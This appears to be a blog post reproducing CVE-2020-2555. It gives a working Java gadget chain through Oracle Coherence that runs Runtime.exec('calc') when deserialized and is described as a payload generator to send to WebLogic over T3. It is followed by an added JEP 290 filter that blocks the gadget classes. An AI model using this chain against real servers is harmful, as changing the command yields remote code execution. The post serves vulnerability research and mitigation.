CVE-2020-2555 WebLogic deserialization gadget reproduction

Introduction

This deserialization gadget lives in the Coherence package. For details, see the analysis.

The chain is constructed much like the Commons-Collections chain, so it can be built by analogy.

Maven doesn't seem to be able to download the Coherence package, which is strange; just download the jar directly.

The deserialized object is sent to WebLogic over T3. So this is just a payload-generation tool.

PoC

```java
package org.example;

import com.tangosol.util.ValueExtractor;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import com.tangosol.util.filter.AlwaysFilter;
import com.tangosol.util.filter.LimitFilter;

import javax.management.BadAttributeValueExpException;
import java.io.*;

/*
Powered by UnicodeSec
 */

public class App
{
    public static void main( String[] args ) throws IOException, ClassNotFoundException {
        // Reflection chain, applied in order to the anchor object (Runtime.class):
        // getMethod("getRuntime") -> invoke(null) -> exec("calc")
        ValueExtractor[] poc = new ValueExtractor[]{
                new ReflectionExtractor("getMethod", new Object[] {
                        "getRuntime", new Class[0] }),
                new ReflectionExtractor("invoke", new Object[] {
                        null, new Object[0] }),
                new ReflectionExtractor("exec", new String[]{"calc"})
        };
        ChainedExtractor chained = new ChainedExtractor(poc);
        // LimitFilter.toString() runs the comparator (the extractor chain) against the top anchor
        LimitFilter limit = new LimitFilter(new AlwaysFilter(), 1);
        limit.setComparator(chained);
        limit.setTopAnchor(Runtime.class);
        // BadAttributeValueExpException.readObject() calls toString() on the wrapped value
        BadAttributeValueExpException expException = new BadAttributeValueExpException(limit);

        // Serialization test
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bytes);
        oos.writeObject(expException);
        oos.close();
        // Deserialization
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes.toByteArray()));
        BadAttributeValueExpException newUser = (BadAttributeValueExpException)ois.readObject();
        System.out.println(newUser.toString());

    }
}
```
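The following is an added example, not code from the original post: a JEP 290 deserialization filter (java.io.ObjectInputFilter, Java 9+) that rejects the Coherence extractor classes, LimitFilter and the BadAttributeValueExpException entry point this chain depends on, so readObject() never reaches the toString() trigger. The class and method names (GadgetFilterDemo, deserializeFiltered) are hypothetical and the resource limits are illustrative values.

```java
import java.io.*;
import javax.management.BadAttributeValueExpException;

// Hypothetical mitigation demo (added example): block the CVE-2020-2555 gadget classes with a JEP 290 filter.
public class GadgetFilterDemo {
    // Reject the Coherence extractor package, LimitFilter and the entry-point class; also cap
    // graph depth, reference count and stream size to blunt other gadget chains.
    // In production prefer an allowlist ending in "!*" so unknown classes are rejected by default.
    static final ObjectInputFilter GADGET_FILTER = ObjectInputFilter.Config.createFilter(
            "!com.tangosol.util.extractor.*;"
          + "!com.tangosol.util.filter.LimitFilter;"
          + "!javax.management.BadAttributeValueExpException;"
          + "maxdepth=20;maxrefs=1000;maxbytes=65536");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bytes)) {
            oos.writeObject(o);
        }
        return bytes.toByteArray();
    }

    // Deserializes with the filter installed; a rejected class raises InvalidClassException
    // before that class's readObject() ever runs.
    static Object deserializeFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(GADGET_FILTER);
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Benign payload passes the filter.
        System.out.println("benign: " + deserializeFiltered(serialize("hello")));

        // Constructed sample: the entry class wrapping a plain String (no Coherence jar needed).
        // The filter rejects it on the class name alone, so the toString() trigger is never reached.
        byte[] entry = serialize(new BadAttributeValueExpException("constructed sample"));
        try {
            deserializeFiltered(entry);
            System.out.println("unexpected: entry class accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same pattern string can be applied JVM-wide with -Djdk.serialFilter=... instead of per stream.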

posted @ 2020-03-18 12:10  potatso